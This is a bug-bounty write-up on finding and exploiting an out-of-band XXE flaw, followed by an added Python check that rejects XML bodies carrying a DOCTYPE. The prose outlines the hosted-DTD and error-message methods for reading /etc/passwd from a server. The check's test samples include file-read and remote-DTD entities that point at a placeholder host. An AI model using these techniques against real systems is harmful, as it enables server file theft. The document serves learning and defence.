Exploiting Out-of-Band XXE in the Wild

Phase 1 → Recon:

I like Shodan and use it to enumerate IPs, so I collected a list of IPs related to my target, which we’ll call redacted.com. After that I ran a full port scan with rustscan (you can use naabu or whatever you want), probed the results for HTTP, and started checking the unusual ports such as 8443, 8080, 8888, 9180, 9000, etc., passing all the requests through Burp. I came across an IP with port 9180 open; the service there used some XML content, so I tried a POST request with Content-Type: application/xml and got some errors! At this stage I decided to test for XXE, which you can read about and practice here, so let’s try to exploit it!

Phase 2 → Analysis:

I tried the payload that was used to detect the vulnerability, but the response contained only errors, so I tried to retrieve local files directly with the classic payload:

Phase 3 → SSRF:

So I thought I couldn’t get a P1 from this. Next I tried to make the server perform an HTTP request to my Burp Collaborator (SSRF), so I fired up Burp again and tried this payload to perform SSRF through the XXE:

Filter responses that contain Connection refused

Phase 4 → OOB XXE:

Now I thought it was time to test for out-of-band XXE, because I could already make an SSRF: if I hosted a malicious DTD file and used the SSRF to force the site to request it, I might achieve the XXE. By the way, I told myself this was the final try to get this XXE. But before the exploitation, you need to understand what OOB XXE is and how it works.

  1. The site requests our malicious DTD file
  2. Our malicious DTD reads the /etc/hostname file and sends it to my IP on port 1337
  3. My listener should receive a request containing the /etc/hostname file content

Phase 5 → XXE Final Exploitation:

At this stage I tried everything I know from OOB XXE attacks for getting large file contents, such as base64 encoding, FTP, or even some tools built to exfiltrate the data over FTP, but I failed in all these ways :( There was still one thing left to try: getting large file contents via error messages. But how does that work?

  1. Host a malicious DTD file that does two things:
  • defines an XML parameter entity containing the content of the /etc/passwd file.
  • defines an XML parameter entity containing a dynamic declaration of another XML parameter entity; this is evaluated by loading a nonexistent file whose name contains the pre-defined entity from above, which in turn holds the /etc/passwd content.
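The defender’s counterpart to Phases 4 and 5, as an added example that is not code from the original post: a stdlib-only Python pre-parse check of the kind an application/xml endpoint could run. It flags any DOCTYPE, classifies each entity declaration by what resolving it would make the parser do (local file read, external fetch of a hosted DTD), and rejects the body before the XML parser sees it. The request bodies and the collaborator.example host are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
# _LIT: quoted literal(s), last one captured. ENTITY_RE groups: %, name, SYSTEM/PUBLIC, literal.
_LIT = r'(?:["\'][^"\']*["\']\s+)*["\']([^"\']*)["\']'
ENTITY_RE = re.compile(r'<!ENTITY\s+(%)?\s*([\w.:-]+)\s+(?:(SYSTEM|PUBLIC)\s+)?' + _LIT, re.I)
EXT_ID_RE = re.compile(r'(SYSTEM|PUBLIC)\s+' + _LIT, re.I)  # external subset in the DOCTYPE header

def classify_uri(uri):
    """Say what resolving this system identifier would make the parser do."""
    u = uri.strip().lower()
    if u.startswith(("http:", "https:", "ftp:", "gopher:", "jar:")):
        return "external fetch (SSRF / OOB DTD load)"
    if u.startswith("file:") or u.startswith("/"):
        return "local file read"
    return "external (unknown scheme)"

def analyze_xml_body(body):
    """Triage one request body: is there a DOCTYPE, and what would each entity make the parser do?"""
    findings = []
    m = re.search(r"<!DOCTYPE\b", body, re.I)
    if not m:
        return {"has_doctype": False, "findings": findings, "verdict": "allow"}
    lb, gt = body.find("[", m.end()), body.find(">", m.end())
    header_end = min(i for i in (lb, gt, len(body)) if i != -1)  # first of '[' / '>' / EOF
    ext = EXT_ID_RE.search(body[m.end():header_end])
    if ext:
        findings.append(("DOCTYPE external subset", classify_uri(ext.group(2))))
    if header_end == lb:  # internal subset present: walk its entity declarations
        rb = body.find("]", lb + 1)
        for pct, name, kw, lit in ENTITY_RE.findall(body[lb + 1:rb if rb != -1 else len(body)]):
            label = f"parameter entity %{name}" if pct else f"general entity &{name};"
            findings.append((label, classify_uri(lit) if kw else "internal (replacement text only)"))
    # This service never needs a DTD, so any DOCTYPE is rejected whatever it declares.
    return {"has_doctype": True, "findings": findings, "verdict": "reject"}

def parse_untrusted(body):
    """Gate the body on the triage result before the XML parser ever sees it."""
    report = analyze_xml_body(body)
    if report["verdict"] == "reject":
        raise ValueError("DOCTYPE rejected: " + "; ".join(f"{w} -> {k}" for w, k in report["findings"]))
    return ET.fromstring(body)

# Constructed request bodies, not captured traffic; collaborator.example is a placeholder host.
SAMPLES = {
    "benign": '<?xml version="1.0"?><order><id>42</id></order>',
    "file_read": '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><r>&xxe;</r>',
    "oob_dtd": '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://collaborator.example/x.dtd"> %dtd;]><r/>',
    "ext_subset": '<!DOCTYPE r SYSTEM "http://collaborator.example/x.dtd"><r/>',
}
```

The findings list doubles as log material for detection: a parameter entity pointing at an http: URI is exactly the signature of the hosted-DTD flow described above, while the verdict itself never depends on the classification.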



Mahmoud Youssef

Cyber Security Researcher | Bug Hunter